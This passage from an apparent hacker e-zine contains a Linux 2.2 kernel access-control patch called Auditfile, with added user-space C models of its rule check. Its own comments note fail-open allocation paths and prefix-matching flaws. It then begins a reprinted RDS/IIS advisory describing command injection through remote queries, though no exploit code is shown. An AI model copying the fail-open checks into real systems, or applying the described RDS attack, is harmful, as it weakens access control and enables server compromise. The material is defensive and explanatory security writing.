	retval = copy_thread(nr, clone_flags, usp, p, regs);
	if (retval)
		goto bad_fork_cleanup_mm;
	p->semundo = NULL;

	/* INCLUDED FOR AUDITFILE */
	if (current->auditfile_len > 0) {
		p->auditfile_len = current->auditfile_len;
		p->auditfile = (char *) kmalloc(p->auditfile_len, GFP_KERNEL);
		if (p->auditfile == NULL) {
			/* NOTE: this fails open: a child that cannot get a copy of the
			   rules runs unrestricted.  Failing the fork with -ENOMEM
			   (goto bad_fork_cleanup_mm) would be the safe choice. */
			printk(KERN_INFO "Warning: out of mem to add auditfile rules to process %d\n", p->pid);
			p->auditfile_len = 0;
		} else {
			memcpy(p->auditfile, current->auditfile, current->auditfile_len);
		}
	}
	/* END OF INCLUDED FOR AUDITFILE */

	/* ok, now we should be set up.. */
	p->swappable = 1;
	p->exit_signal = clone_flags & CSIGNAL;
	p->pdeath_signal = 0;

	/*
	 * "share" dynamic priority between parent and child, thus the
	 * total amount of dynamic priorities in the system doesnt change,
	 * more scheduling fairness. This is only important in the first
	 * timeslice, on the long run the scheduling behaviour is unchanged.
	 */
	current->counter >>= 1;
	p->counter = current->counter;

	/*
	 * Ok, add it to the run-queues and make it
	 * visible to the rest of the system.
	 *
	 * Let it rip!
	 */
	retval = p->pid;
	if (retval) {
		write_lock_irq(&tasklist_lock);
		SET_LINKS(p);
		hash_pid(p);
		write_unlock_irq(&tasklist_lock);
		nr_tasks++;

		p->next_run = NULL;
		p->prev_run = NULL;
		wake_up_process(p);		/* do this last */
	}
	++total_forks;
bad_fork:
	unlock_kernel();
	up(&current->mm->mmap_sem);
fork_out:
	if ((clone_flags & CLONE_VFORK) && (retval > 0))
		down(&sem);
	return retval;

bad_fork_cleanup_mm:
	mmput(p->mm);
	p->mm = NULL;
bad_fork_cleanup_sighand:
	exit_sighand(p);
bad_fork_cleanup_fs:
	exit_fs(p); /* blocking */
bad_fork_cleanup_files:
	exit_files(p); /* blocking */
bad_fork_cleanup:
	if (p->exec_domain && p->exec_domain->module)
		__MOD_DEC_USE_COUNT(p->exec_domain->module);
	if (p->binfmt && p->binfmt->module)
		__MOD_DEC_USE_COUNT(p->binfmt->module);

	add_free_taskslot(p->tarray_ptr);
bad_fork_cleanup_count:
	if (p->user)
		free_uid(p);
bad_fork_free:
	free_task_struct(p);
	goto bad_fork;
}
-----[ END OF ADULT CONTENTS ]-----

Besides editing the fork, we should make it initialise the char *auditfile and the int auditfile_len on the first process (the process of init), so in /usr/src/linux/kernel/init.c we add something too:

-----[ WARNING ADULT CONTENTS ]-----
static int init(void * unused)
{
	lock_kernel();
	do_basic_setup();

	/*
	 * Ok, we have completed the initial bootup, and
	 * we're essentially up and running. Get rid of the
	 * initmem segments and start the user-mode stuff..
	 */
	free_initmem();
	unlock_kernel();

	/* INCLUDED FOR AUDITFILE */
	current->auditfile = NULL;
	current->auditfile_len = 0;
	/* END OF INCLUDED FOR AUDITFILE */
-----[ END OF ADULT CONTENTS ]-----

------------------[ destroying memory when process dies

Because this is arch specific and I use an x86, I only edit /usr/src/linux/arch/i386/kernel/process.c

-----[ WARNING ADULT CONTENTS ]-----
void free_task_struct(struct task_struct *p)
{
	/* INCLUDED FOR AUDITFILE */
	if (p->auditfile_len > 0) {
		kfree(p->auditfile);
	}
	{	/* extra block: the declaration below may not follow a statement in C89 */
	/* END OF INCLUDED FOR AUDITFILE */
#ifdef EXTRA_TASK_STRUCT
	int index = task_struct_stack_ptr+1;

	if (index < EXTRA_TASK_STRUCT) {
		task_struct_stack[index] = p;
		task_struct_stack_ptr = index;
	} else
#endif
		free_pages((unsigned long) p, 1);
	/* INCLUDED FOR AUDITFILE */
	}
	/* END OF INCLUDED FOR AUDITFILE */
}
-----[ END OF ADULT CONTENTS ]-----

------------------[ check for auditfile rules when a process wants to read/write to a file

When a process opens a file it calls the sys_open function, and this function (indirectly) calls open_namei(). On 2.2.12 the stock open_namei() is the body of the patched function listed below without the block marked "INCLUDED FOR AUDITFILE"; the only difference between the two is that block. The function checks permissions, resolves symlinks and so on, and when everything is OK it returns the dentry and access is granted.
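The rule buffer described under "How should this memory look like?" and the lookup that the patched open_namei() further down performs on it, modelled in user space as an added example; this is not code from the auditfile patch or its tarball. The parser takes the same "r/path w/path b/path" string the module takes from insmod, the function names and the FMODE_* values (1 = read, 2 = write, the low bits of open_namei's flag on 2.2) are ours, and the matcher requires the mask to cover the whole path, so "/etc/" does not cover "/etc/passwd" unless written "/etc/*" (the paper's own auditfile_expression() further down treats the mask as a prefix).

```c
/* Added example (not from the auditfile patch): encode rules the way the
 * module does, then answer "may this process open this path this way?" the
 * way the open_namei() hook does, with a full-match glob matcher. */
#include <stdio.h>
#include <string.h>

#define AF_READ   1
#define AF_WRITE  2
#define AF_BOTH   3

#define FMODE_READ  1          /* low bits of open_namei's flag on 2.2 */
#define FMODE_WRITE 2

#define DEMO_RULES "r/usr/bin/* r/etc/* b/tmp* w/tmp/write/*"   /* constructed */

/* Encode "r/usr/bin/* w/tmp/write/*" into buf as "\0<flag>mask\0<flag>mask\0\0".
   Returns the encoded length, or -1 if a rule has no r/w/b flag or buf is too small. */
int auditfile_encode(const char *parm, char *buf, size_t bufsize)
{
	size_t j = 0;
	const char *p = parm;

	for (;;) {
		char flag;
		while (*p == ' ')
			p++;
		if (*p == 0)
			break;
		switch (*p++) {
		case 'r': flag = AF_READ;  break;
		case 'w': flag = AF_WRITE; break;
		case 'b': flag = AF_BOTH;  break;
		default:  return -1;          /* every rule starts with r, w or b */
		}
		if (j + 4 > bufsize)              /* "\0flag" now plus "\0\0" at the end */
			return -1;
		buf[j++] = 0;
		buf[j++] = flag;
		while (*p != 0 && *p != ' ') {
			if (j + 3 > bufsize)          /* this byte plus the terminator */
				return -1;
			buf[j++] = *p++;
		}
	}
	if (j + 2 > bufsize)
		return -1;
	buf[j++] = 0;
	buf[j++] = 0;
	return (int) j;
}

/* Glob match: '*' matches any (possibly empty) run, everything else is literal.
   Returns 1 only when mask covers the whole path, 0 otherwise. */
int auditfile_match(const char *path, const char *mask)
{
	for (;; path++, mask++) {
		if (*mask == '*') {
			mask++;
			if (*mask == 0)
				return 1;                 /* trailing '*' swallows the rest */
			for (;; path++) {             /* try every suffix of path */
				if (auditfile_match(path, mask))
					return 1;
				if (*path == 0)
					return 0;
			}
		}
		if (*mask != *path)
			return 0;                     /* also catches one side ending early */
		if (*mask == 0)
			return 1;                     /* both ended together: full match */
	}
}

/* The check the patched open_namei() makes: the open is allowed iff some rule's
   flag covers every access bit requested and its mask matches the path. */
int auditfile_allows(const char *rules, int len, const char *path, int fmode)
{
	int need = ((fmode & FMODE_READ) ? AF_READ : 0) |
	           ((fmode & FMODE_WRITE) ? AF_WRITE : 0);
	int i;

	for (i = 0; i + 1 < len; i++) {
		if (rules[i] != 0)
			continue;                     /* inside a mask, skip */
		if (rules[i + 1] == 0)
			break;                        /* "\0\0": end of the rule list */
		{
			int flag = rules[i + 1];
			const char *mask = rules + i + 2;
			if ((flag & need) == need && auditfile_match(path, mask))
				return 1;
			i += 1 + (int) strlen(mask);  /* jump to this mask's last byte */
		}
	}
	return 0;
}

/* Wrapper around the constructed DEMO_RULES set; -1 if encoding fails. */
int demo_check(const char *path, int fmode)
{
	char rules[256];
	int len = auditfile_encode(DEMO_RULES, rules, sizeof rules);
	return len > 0 ? auditfile_allows(rules, len, path, fmode) : -1;
}

int main(void)
{
	const char *paths[] = { "/usr/bin/ls", "/etc/passwd", "/tmp/x", "/tmp/write/log", "/root/.bashrc" };
	const int modes[] = { FMODE_READ, FMODE_WRITE, FMODE_READ | FMODE_WRITE };
	const char *names[] = { "read", "write", "read/write" };
	int p, m;

	for (p = 0; p < 5; p++)
		for (m = 0; m < 3; m++)
			printf("%-16s %-10s %s\n", paths[p], names[m],
			       demo_check(paths[p], modes[m]) ? "allowed" : "denied");
	return 0;
}
```

The "need" bit test is the readable form of the long condition in the hook: a write needs flag 2 or 3, a read needs 1 or 3, a read/write open needs 3, and an open that needs no permission (need 0) is satisfied by any rule whose mask matches.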
We don't want to lose normal restrictions and have our auditfile rules overrule general permissions so we have to put our rules as last, just before return dentry. This is how i implemented it: -----[ WARNING ADULT CONTENTS ]----- /* * open_namei() * * namei for open - this is in fact almost the whole open-routine. * * Note that the low bits of "flag" aren't the same as in the open * system call - they are 00 - no permissions needed * 01 - read permission needed * 10 - write permission needed * 11 - read/write permissions needed * which is a lot more logical, and also allows the "no perm" needed * for symlinks (where the permissions are checked later). */ struct dentry * open_namei(const char * pathname, int flag, int mode) { int acc_mode, error; struct inode *inode; struct dentry *dentry; mode &= S_IALLUGO & ~current->fs->umask; mode |= S_IFREG; dentry = lookup_dentry(pathname, NULL, lookup_flags(flag)); if (IS_ERR(dentry)) return dentry; acc_mode = ACC_MODE(flag); if (flag & O_CREAT) { struct dentry *dir; if (dentry->d_inode) { error = -EEXIST; if (flag & O_EXCL) goto exit; #ifdef CONFIG_SECURE_FIFO if (!S_ISFIFO(dentry->d_inode->i_mode)) goto nocreate; #else goto nocreate; #endif } dir = lock_parent(dentry); if (!check_parent(dir, dentry)) { /* * Really nasty race happened. What's the * right error code? We had a dentry, but * before we could use it it was removed * by somebody else. We could just re-try * everything, I guess. * * ENOENT is definitely wrong. */ error = -ENOENT; unlock_dir(dir); goto exit; } #ifdef CONFIG_SECURE_FIFO /* * Don't write to FIFOs that we don't own in +t directories, * unless the FIFO is owned by root. 
*/ if ((inode = dentry->d_inode)) if (S_ISFIFO(inode->i_mode) && !(flag & O_EXCL) && (dir->d_inode->i_mode & S_ISVTX) && inode->i_uid && current->fsuid != inode->i_uid) { security_alert("denied writing FIFO of %d.%d " "by UID %d, EUID %d, process %s:%d", "writes into a FIFO denied", inode->i_uid, inode->i_gid, current->uid, current->euid, current->comm, current->pid); error = -EACCES; unlock_dir(dir); goto exit; } #endif /* * Somebody might have created the file while we * waited for the directory lock.. So we have to * re-do the existence test. */ if (dentry->d_inode) { error = 0; if (flag & O_EXCL) error = -EEXIST; } else if ((error = may_create(dir->d_inode, dentry)) == 0) { if (!dir->d_inode->i_op || !dir->d_inode->i_op->create) error = -EACCES; else { DQUOT_INIT(dir->d_inode); error = dir->d_inode->i_op->create(dir->d_inode, dentry, mode); /* Don't check for write permission, don't truncate */ acc_mode = 0; flag &= ~O_TRUNC; } } unlock_dir(dir); if (error) goto exit; } nocreate: error = -ENOENT; inode = dentry->d_inode; if (!inode) goto exit; error = -ELOOP; if (S_ISLNK(inode->i_mode)) goto exit; error = -EISDIR; if (S_ISDIR(inode->i_mode) && (flag & FMODE_WRITE)) goto exit; error = permission(inode,acc_mode); if (error) goto exit; /* * FIFO's, sockets and device files are special: they don't * actually live on the filesystem itself, and as such you * can write to them even if the filesystem is read-only. */ if (S_ISFIFO(inode->i_mode) || S_ISSOCK(inode->i_mode)) { flag &= ~O_TRUNC; } else if (S_ISBLK(inode->i_mode) || S_ISCHR(inode->i_mode)) { error = -EACCES; if (IS_NODEV(inode)) goto exit; flag &= ~O_TRUNC; } else { error = -EROFS; if (IS_RDONLY(inode) && (flag & 2)) goto exit; } /* * An append-only file must be opened in append mode for writing. 
	 */
	error = -EPERM;
	if (IS_APPEND(inode)) {
		if ((flag & FMODE_WRITE) && !(flag & O_APPEND))
			goto exit;
		if (flag & O_TRUNC)
			goto exit;
	}

	if (flag & O_TRUNC) {
		error = get_write_access(inode);
		if (error)
			goto exit;

		/*
		 * Refuse to truncate files with mandatory locks held on them.
		 */
		error = locks_verify_locked(inode);
		if (!error) {
			DQUOT_INIT(inode);
			error = do_truncate(dentry, 0);
		}
		put_write_access(inode);
		if (error)
			goto exit;
	} else
		if (flag & FMODE_WRITE)
			DQUOT_INIT(inode);

	/*
	 * Auditfile: only processes that were given a rule set have
	 * current->auditfile_len > 0; everything else is untouched.
	 */
	if (current->auditfile_len > 0) {
		int i;
		char *filename;
		int errorauditfile = 0;
		char *page = NULL;	/* scratch page for the absolute path */

		if (pathname[0] != '/') {
			/*
			 * Relative path: rebuild the absolute name by walking
			 * d_parent up to the process root, like d_path() does.
			 */
			struct dentry * dentrybackup = dentry;
			page = (char *) __get_free_page(GFP_USER);
			if (page) {
				char * end = page+PAGE_SIZE;
				char * retval;
				struct dentry * root = current->fs->root;
				int buflen = PAGE_SIZE;
				*--end = '\0';
				buflen--;
				/* a path that resolves to the root itself is "/" */
				retval = end - 1;
				*retval = '/';
				for (;;) {
					struct dentry * parent;
					int namelen;
					if (dentry == root)
						break;
					dentry = dentry->d_covers;
					parent = dentry->d_parent;
					if (dentry == parent)
						break;
					namelen = dentry->d_name.len;
					buflen -= namelen + 1;
					if (buflen < 0)
						break;
					end -= namelen;
					memcpy(end, dentry->d_name.name, namelen);
					*--end = '/';
					retval = end;
					dentry = parent;
				}
				dentry = dentrybackup;
				filename = retval;
				/*
				 * The page is freed after the rule loop below;
				 * filename points into it until then.
				 */
			} else {
				/*
				 * NOTE: this fails open - an allocation failure
				 * skips the rule check instead of refusing.
				 */
				printk(KERN_INFO "auditfile: out of memory, dropped auditfile security\n");
				return dentrybackup;
			}
		} else {
			filename = pathname;
		}

		/*
		 * Rules are stored back to back: a 0 byte, the mode byte
		 * (1 = read, 2 = write, 3 = both), then the NUL-terminated
		 * pattern; two consecutive 0 bytes end the list.  The open
		 * is allowed only if some rule covers every access requested
		 * (read, write or both) and its pattern matches the path.
		 */
		for (i = 0; i < current->auditfile_len; i++) {
			if (current->auditfile[i] == 0) {
				if (current->auditfile[i+1] == 0)
					break;
				if ((((flag & FMODE_WRITE) && (current->auditfile[i+1] == 2) || (current->auditfile[i+1] == 3)) || !(flag & FMODE_WRITE)) &&
				    (((flag & FMODE_READ) && (current->auditfile[i+1] == 1) || (current->auditfile[i+1] == 3)) || !(flag & FMODE_READ))) {
					if (auditfile_expression(filename, current->auditfile + i + 2) == 1) {
						errorauditfile = 1;
						break;
					}
				}
			}
		}
		if (page)
			free_page((unsigned long) page);
		/* no rule matched: default deny */
		if (errorauditfile != 1) {
			error = -EACCES;
			goto exit;
		}
	}
	return dentry;

exit:
	dput(dentry);
	return ERR_PTR(error);
}

-----[ END OF ADULT CONTENTS ]-----

The function
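auditfile_expression, reproduced just after this example, does the pattern matching. As an added example that is not part of the paper (my own code, not the author's), here is a user-space model of the rule check open_namei() performs above, using the rule syntax of the author's *.telnetd.conf files: r, w or b followed by a path pattern, with '*' matching any run of characters. The config subset and the test paths are constructed. One caveat it makes visible: a rule only counts if its mode covers every access the open() asks for, so an O_RDWR open of a file that has separate 'r' and 'w' rules is still refused; it needs a 'b' rule.

```c
/*
 * Added example, not part of the Auditfile paper: a user-space model of
 * the rule check in the open_namei() patch.  Rules use the syntax of the
 * author's *.telnetd.conf files: one per line, a mode letter (r = read,
 * w = write, b = both) followed by a path pattern in which '*' matches
 * any run of characters.  With no matching rule the kernel returns
 * -EACCES (default deny).
 */
#include <stdio.h>
#include <string.h>

#define AF_READ  1   /* FMODE_READ  in the kernel */
#define AF_WRITE 2   /* FMODE_WRITE in the kernel */

struct af_rule {
	int  mode;        /* bitmask of AF_READ / AF_WRITE the rule permits */
	char mask[128];   /* path pattern, e.g. "/home/website*" */
};

/*
 * Exact glob match: '*' matches zero or more characters, everything
 * else is literal, and path and mask must end together.
 */
static int af_match(const char *path, const char *mask)
{
	for (;;) {
		if (*mask == '*') {
			/* let '*' absorb 0..n characters, try each remainder */
			const char *p = path;
			for (;;) {
				if (af_match(p, mask + 1))
					return 1;
				if (*p == '\0')
					return 0;
				p++;
			}
		}
		if (*path == '\0' || *mask == '\0')
			return *path == '\0' && *mask == '\0';
		if (*path != *mask)
			return 0;
		path++;
		mask++;
	}
}

/* Parse one config line such as "r/etc/*"; 0 on success, -1 if malformed. */
static int af_parse_rule(const char *line, struct af_rule *out)
{
	switch (line[0]) {
	case 'r': out->mode = AF_READ;            break;
	case 'w': out->mode = AF_WRITE;           break;
	case 'b': out->mode = AF_READ | AF_WRITE; break;
	default:  return -1;
	}
	if (line[1] != '/' || strlen(line + 1) >= sizeof(out->mask))
		return -1;
	strcpy(out->mask, line + 1);
	return 0;
}

/*
 * Mirror of the kernel check.  'wanted' is the access the open() asks
 * for; a rule only counts if its mode covers all of it, so an O_RDWR
 * open needs a 'b' rule even where separate 'r' and 'w' rules match.
 * Returns 1 if permitted, 0 where the kernel would return -EACCES.
 */
static int af_allowed(const struct af_rule *rules, int n,
		      const char *path, int wanted)
{
	int i;
	for (i = 0; i < n; i++) {
		if ((wanted & rules[i].mode) != wanted)
			continue;
		if (af_match(path, rules[i].mask))
			return 1;
	}
	return 0;
}

/* Constructed subset of the author's website.telnetd.conf from the text. */
static const char *const website_conf[] = {
	"b/dev*", "r/etc/*", "r/lib/*", "r/usr/sbin/website",
	"r/home/website*", "w/home/website/.bash_history", "r/bin/*",
	"b/var/*", "r/sbin/su", "r/usr/lib*",
};

/* Evaluate one path/access pair against website_conf. */
int af_check_website(const char *path, int wanted)
{
	struct af_rule rules[16];
	int n = 0;
	size_t i;
	for (i = 0; i < sizeof website_conf / sizeof website_conf[0]; i++)
		if (af_parse_rule(website_conf[i], &rules[n]) == 0)
			n++;
	return af_allowed(rules, n, path, wanted);
}

int main(void)
{
	const char *p = "/home/website/.bash_history";
	printf("%s O_WRONLY: %s\n", p, af_check_website(p, AF_WRITE) ? "allowed" : "denied");
	printf("%s O_RDWR:   %s\n", p, af_check_website(p, AF_READ | AF_WRITE) ? "allowed" : "denied");
	return 0;
}
```

The matcher here requires path and mask to end together. The paper's auditfile_expression(), as printed, compares the string pointer rather than the current character in its end-of-string test, so with it a mask that is exhausted matches any longer path as well (prefix semantics); that is worth knowing when a rule such as r/usr/sbin/website is meant to cover exactly one file.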
auditfile_expression is the following:

-----[ WARNING ADULT CONTENTS ]-----

int auditfile_expression(char *string_base, char *string_mask)
{
	int i, j, ok = 0;

	for (i = 0;; i++) {
		/*
		 * End-of-string test.  Note that string_base here is the
		 * pointer, not string_base[i]: it is never 0, so the first
		 * half fires as soon as the mask runs out and the second
		 * half never fires.  In effect a mask that is exhausted
		 * matches whatever is left of the path, so "/etc/" matches
		 * "/etc/passwd" just as "/etc/*" does.
		 */
		if (((string_mask[i] == 0) && (string_base != 0)) ||
		    ((string_mask[i] != 0) && (string_base == 0)))
			return 1;
		if (string_mask[i] == '*') {
			/*
			 * Let '*' absorb 0..n characters of the path and try
			 * the rest of the mask against every remainder.
			 */
			for (j = 0;; j++) {
				if (auditfile_expression(string_base + i + j, string_mask + i + 1) == 1)
					return 1;
				if (string_base[i+j] == 0)
					return 0;
			}
		} else if (string_base[i] == string_mask[i])
			ok = 1;
		else
			return 0;
	}
	return ok;
}

-----[ END OF ADULT CONTENTS ]-----

It does the matching of, for example, the mask bl*t against blaat, and so on.

----------[ some options I use at my box

in.telnetd.conf

b/dev*
r/etc/*
r/lib/*
r/usr/*
b/home/*
r/bin/*
b/tmp/*
b/var/*

website.telnetd.conf

b/dev*
r/etc/*
r/lib/*
r/usr/sbin/website
r/home/website*
w/home/website/.bash_history
r/bin/*
b/var/*
r/sbin/su
r/usr/bin/dircolors
r/security*
r/usr/bin/vi
r/usr/bin/vim
r/usr/bin/talk
r/root/.bashrc
r/usr/local/bin/tty
r/usr/local/bin/who
r/usr/bin/write
r/usr/bin/mesg
r/usr/bin/grep
r/usr/bin/awk
r/usr/bin/sed
r/usr/bin/less
r/usr/lib*

(Yeah, these are the restrictions I use on the shell on our website)

-------------------------------------------------------------------------------

Download my Auditfile tarball for examples of how to use this; the shell on our website is secured with Auditfile.

Some Extra Security In The Linux Kernel - Auditfile
a paper by Frank van Vliet alias {} karin@root66.nl.eu.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
RooT66 http://root66.nl.eu.org
ShellOracle http://www.shelloracle.cjb.net
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

@HWA

158.0 Lets hack an NT box...how they are being defaced & how to secure
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Info submitted by: anon_defacer & compiled/assembled by Ed.
Intro:
~~~~~~

This isn't exactly bleeding edge information, I know, BUT nonetheless sites are still currently being actively defaced en masse using these techniques (known simply as 'the RDS hack' around the net), so I thought it prudent to print the info and the currently available attack/patch options that are in use or should be employed on your NT server. - Ed

Source: http://www.wiretrip.net/rfp/p/doc.asp?id=1&iface=2

rainforest puppy's advisory and code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.wiretrip.net/rfp/p/doc.asp?id=5&iface=2

#### ALERT! #### RDS/IIS 4.0 Vulnerability and exploit #### ALERT! ####

By rain forest puppy / ADM / Wiretrip

"it...is direct, immediate, and almost 100% guaranteed to work....THE NUMBER OF HUGE SITES THAT ARE VULNERABLE IS RIDICULOUS!" -Russ Cooper, NTBugtraq

"This exploit also does *not* require the presence of any sample web applications or example code...the issue affects at least 50% of the IIS servers I have seen" -Greg Gonzalez, NTBugtraq

"Groovy, baby." -Austin Powers, Spy who Shagged Me

- - -

Table of Contents:

1. Names, PRs and the Media: State of Security Advisories
2. RDS Vulnerability Background
3. *MY* Guess at Greg's RDS Vulnerability
4. Bonus Aspects of My Version of the Exploit
5. Command Line Options
6. Random Q & A
7. Signoff
8. The code!!!!

- 1 - Names, PRs and the Media: State of Security Advisories

When I was at DefCon, I had an interview with a reporter who was doing a story on 'hacker handles'. Of course, with a handle like Rain Forest Puppy, I was a sure-win. After a 20 minute chat, the last question he asked me was "What is your real name?" Of course, my response was "does that matter?" Well, to him it did. It seems like it matters to all the big, formal media types and vendors. A perfect example of this would be the whole RDS saga. Greg Gonzalez's original post gave me credit, since he used some of what I talked about in my ODBC advisory posted to Bugtraq earlier (thanks, Greg!).
Russ Cooper did a recap, but failed to mention me. Microsoft's advisory acknowledged Russ and Greg as well, sans me. Now, I'm not an egomaniac that needs to see my name splashed over everything. For that matter, those of you who know me personally know how laid back I am concerning most issues. The point I'm trying to make is whether or not a name is 'unsuitable' for mention in something as flashy as a Russ or MS post (although side note, I must admit, Wired and ZDNet have lightened up to this fact, especially lately with all the Dildog and Orifice talk going on). If I remember correctly, David Litchfield got some mentions for various vulnerability findings he had. But everyone referenced him as David Litchfield, not 'Mnemonix', which is his hacker handle (BTW, greetings to Mnemonix. Thanks for serving as an example. :) Even lately, for those of you Bugtraq fans out there (hey, how the hell are you reading this, anyway!?!?!), you'll have noticed gone are the loveable bytes of 'Aleph1' in place of Elias Levy. Now, in Aleph1's defense, I can see justification of the shift. But the general fact that there is a need/trend for a shift is concerning me. The only taboo I can think of for the 'evil' of a hacker handle is the issue of the obvious: anonymity. Apparently I must be running around doing 'very bad things' (funny movie, BTW), and so I need to hide who I really am, right? Uh, no. (For lack of a snappy comeback) I don't want to make this diatribe overly long, since I know you're only here for the exploits anyway :) But seriously, why use a handle? Well, there is a sense of tradition, for one. I shall not explain, because I think it's apparent. The other is a sense of community. If you're going to engage in a security discussion, why not do it with other security professionals. And where can you just so happen to find a large gaggle of people who know about security? Your local IRC server, sitting in #hackphreak (watch out, JP logs), #hackteach, etc. 
These people have nicknames themselves. So get yourself a nick and join in the conversation!

But really, I use an alias. Does that make me evil? If I told you my real name, would that shift your perspective of me into the light of good? We'll get back to this; I want to digress to another issue.

I use a handle. My only collateral at this point is my name, and my name alone. If I find a big hole, post a research paper, etc, it adds nothing but perhaps an "atta'boy" to the accomplishments of my nickname. I've talked to people in real life and held discussions about that 'Rain Forest Puppy' guy, they not knowing I was Rain Forest Puppy. The accomplishments belong to that name, and that name alone...unless I start equating that name with other things.

So, let's pretend I did. Let's say I tossed my real name out there, and got that associated with my handle. Now people in real life will equate the findings of Rain Forest Puppy to me. I can add in my company name. Now my company can ride the 'success' (if you will) of my findings as well, just because they're associated with my name. (Come on, you know these situations exist. Transmeta is cool just because the name 'Linus' is involved.) If I equate all kinds of aspects together, I can then distribute the attention (a.k.a. advertising) to them all as well. Think about it....if I found the next remote root compromise in, say, sshd, I could slap not only my handle and name but also my company name (Amazonian Trees, Inc) all over it! Wow, would that not be great marketing for Amazonian Trees, Inc, especially if ATI's primary service was security related! But hey, it's America. We live to make money, so it seems. So why not do this? Right?

Well, 'tis also the trend. Look at all the press releases on security issues. The most recent one was by Greg Gonzalez himself, for his company Information Technologies Enterprises, Inc.
The press release is at http://www.infotechent.net/itenews.htm Now, what I find interesting is that Greg has made a post to NTBugtraq about the RDS vulnerability, yet will not release details of the vulnerability until next week. Hmmm. Ok, so he can't release details, but he can release press releases about it. Your point was made with the post to NTBugtraq...the point of the press release is to ride the fame to gain corporate exposure (which I'm equating as an excessive, corporate, political machine type move which isn't all that wonderful). Not to pick on Greg, because it's the trend. Look at WebTrends. They issued a press release on 'their finding of security vulnerabilities in IIS sample scripts' (never mind the fact that I had talked about such in a previous Phrack article last December). The press release is at http://www.webtrends.com/news/releases/release.asp?id=81 Wow, a vendor of a security scanner using the finding of vulnerabilities as free marketing for their products. Well, do it where you can, right? I will move off this subject, because L0pht has a nice long composition on the matter in the Soapbox on their website, at http://www.l0pht.com/~oblivion/soapbox/index.html One interesting statement L0pht makes, going back to Greg Gonzalez and Russ Cooper keeping the details of the RDS vulnerability to themselves for a week: "Now we have software vendors keeping things secret. At least secret for a substantial period of time. Is this the way we want the industry to behave?" Wow, right on, brothers Mudge, Dildog, Weld Pond et al. Greetings, BTW. ---- Credits and Thank Yous ---------------------------------------------- I'd like to take this brief moment to say thank you to L0pht (www.l0pht.com) for helping me test my perl script and taking time to review my advisory. I'd also like to thank Vacuum of www.technotronic.com and Mike Dinowitz of www.houseoffusion.com for their input and testing as well. 
--------------------------------------------------------------------------

So back to the 'only a handle' thing. You have to understand that I have a different perspective on it all. I publish everything under an anonymous handle. What do I gain from this? Nothing personally. Nada. Zip. The handle itself may gain some fame, but not me personally. I do not profit from this one way or another. What I do I do because I want to, on my free time--and do it in a manner that is not greedy in any aspect. I don't seek to gain, and in the current setup, I really can't gain a whole hell of a lot. But I'm the bad guy, I forgot. It's much more normal to leverage a security vulnerability as a marketing tool than it is to just 'give' time and research away. Wow, I need to get with the Y2K I guess. Fine then.

(Last tangent, then we'll get to the RDS issue, I promise :)

So, going back to you seeing me in the light of good.... Could you better relate if you had a 'normal' name? Are you embarrassed to say/use 'Rain Forest Puppy' in conversation/publication? (Well, I mean this generically for all hacker handles, but I'm specifically talking about mine here) Would I be seen as more of a security resource/less of an evil hacker if you had a name to associate with my handle? Well, I guess I should make that step. From now on, you can associate Mr. Russell F. Prigogine with the nick Rain Forest Puppy (Hmmm...no, the initials are not mere coincidence...clever, eh?). But since the big 'Russ' on campus is Russ Cooper, NTBugtraq moderator extraordinaire (who believes sample apps are not a security concern worth talking about. Real slick, Russ), I would prefer that Mr. R.F. Prigogine (Mr. optional) be used, if you can't--or don't want to--use the nick Rain Forest Puppy. So there. (As some would say) I sold out (oh, the horror of it). JP, add that to your profile database.

While I gather the broken pieces of my dignity we'll move along to what you really want...
- 2 - RDS Vulnerability Background

Last Friday Greg Gonzalez (re)posted his findings of vulnerabilities in regards to the RDS problems originally detailed in MS98-004, which came out around July 16, '98. He took that issue (which is basically the simple fact that 'Remote Data Service' components allow *remote* access to your *data*....who would have thought?) and combined it with the Jet pipe/VBA delimiter 'feature' I discussed in my recent advisory. The result?

1. You can make remote queries via RDS
2. You can embed NT command line commands in queries

Well, that's a pretty good combo. (side note, not to brag or anything, but I mention the fact that RDS can be used to do that in my ODBC advisory, under the title 'Msadc'). But, Greg threw in a twist which supposedly is the kicker:

3. You don't need user IDs (and therefore no password required), does *not* require the presence of any sample Web applications or example code, or even an active database

I suppose that's a pretty big kick. Wow, no UIDs/passwords, NO SAMPLE SCRIPTS! Well, I guess that means Russ Cooper will let the post through then... (if you don't get it, go back and re-read section one). So Greg can do all that. And, to reiterate how dangerous this problem really is...

"it...is direct, immediate, and almost 100% guaranteed to work....THE NUMBER OF HUGE SITES THAT ARE VULNERABLE IS RIDICULOUS!" -Russ Cooper, NTBugtraq

"This exploit also does *not* require the presence of any sample web applications or example code...the issue affects at least 50% of the IIS servers I have seen" -Greg Gonzalez, NTBugtraq

*** MEDIA FOLKS *** As it seems it's fun to attach dollar loss amounts to advisories, I will say the potential amount of damage, due to the fact that at least 50% of all IIS servers Greg has seen (hopefully he's seen a lot) are vulnerable, using my sophisticated reliable statistical computation method that is authoritative, I'd place damage loss somewhere in the 'close to Bill Gates salary(tm)' range.
Now, the sad part. As I mentioned before, both Greg and Russ (from this point on, all instances of 'Russ' refer to Russ Cooper, and not the name R. F. Prigogine) know the details of this vulnerability. And yet they are keeping them amongst themselves until next week. Does this even disturb anyone? Greg says at least 50% of the IIS servers are vulnerable... DO WE WANT RUSS COOPER WITH THE KEYS TO 50% OF IIS SERVERS ON THE INTERNET?

Ok, I have a scenario that's the same in principle, but will disturb people even more:

---- Begin same scenario ------------------------------------------------
Rain Forest Puppy (or R. F. Prigogine, if it makes you feel better/is more visually pleasing) has found a hole in the latest build of Apache web server. There's a hole. I will announce there's a hole. I'll write up a few PRs as well. But I will not tell you the exact nature of it. Don't worry, Apache group will code a fix, and you'll be all set in a jiffy. In the meantime, I'm not going to release the details of the exploit of the hole. Instead I'm going to just keep it to myself....and my good buddies Vacuum, Antilove, Stranger, and the rest of the Wiretrip and ADM crews.
-------------------------------------------------------------------------

Hmmm....I bet *that* disturbed you. How about a better translation:

---- Begin translated same scenario -------------------------------------
I, RFP, have found a hole in Apache that I will not tell you about until later, but in the meantime, me and my hacker buddies will know about it! Nnnnnnaaaaaaayyyyyyaaaaahhhhhh! So sit back and feel helpless.
-------------------------------------------------------------------------

